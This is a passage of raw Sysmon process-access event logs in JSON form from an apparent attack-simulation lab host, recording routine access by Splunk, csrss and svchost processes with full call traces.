Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-221D-5F25-0000-001072FD0A00}","TargetProcessId":"2740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221D-5F25-0000-001072FD0A00}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221D-5F25-0000-001072FD0A00}","TargetProcessId":"2740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows